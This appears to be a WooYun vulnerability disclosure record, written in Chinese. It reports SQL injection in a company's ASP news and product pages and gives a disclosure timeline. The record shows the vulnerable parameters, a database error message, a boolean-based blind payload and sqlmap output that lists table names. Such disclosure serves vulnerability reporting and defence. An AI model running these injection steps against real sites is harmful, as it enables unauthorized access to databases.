乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-19: 细节已通知厂商并且等待厂商处理中 2016-01-21: 厂商已经确认,细节仅向厂商公开 2016-01-31: 细节向核心白帽子及相关领域专家公开 2016-02-10: 细节向普通白帽子公开 2016-02-20: 细节向实习白帽子公开 2016-03-06: 细节向公众公开
成育科技股份有限公司sql注入打包
注入点1:
http://**.**.**.**/news01.asp?news_index=74
注入点2:
http://**.**.**.**/product02.asp?sonclass=140
单引号报错:
Microsoft JET Database Engine 錯誤 '80040e14'查詢運算式 'news_index=74?' 中的 語法錯誤 (少了運算元)。/inc/zFunDBConnect.asp, 列36
Place: GETParameter: news_index Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: news_index=74 AND 1701=1701---[12:44:24] [INFO] the back-end DBMS is Microsoft Accessweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: Microsoft Access
跑起来好慢,我就证明一下
[12:44:28] [INFO] adding words used on web page to the check listplease enter number of threads? [Enter for 1 (current)][12:44:29] [WARNING] running in a single-thread mode. This could take a while.[12:44:43] [INFO] retrieved: product[12:45:07] [INFO] retrieved: news[12:46:14] [INFO] retrieved: company[12:58:30] [INFO] tried 1866/3167 items (59%)[12:58:51] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[13:02:25] [INFO] tried 2262/3167 items (71%)[13:02:46] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[13:07:49] [INFO] tried 2807/3167 items (89%)[13:08:10] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request[13:08:26] [INFO] tried 2829/3167 items (89%)
危害等级:高
漏洞Rank:16
确认时间:2016-01-21 23:53
感謝通報
暂无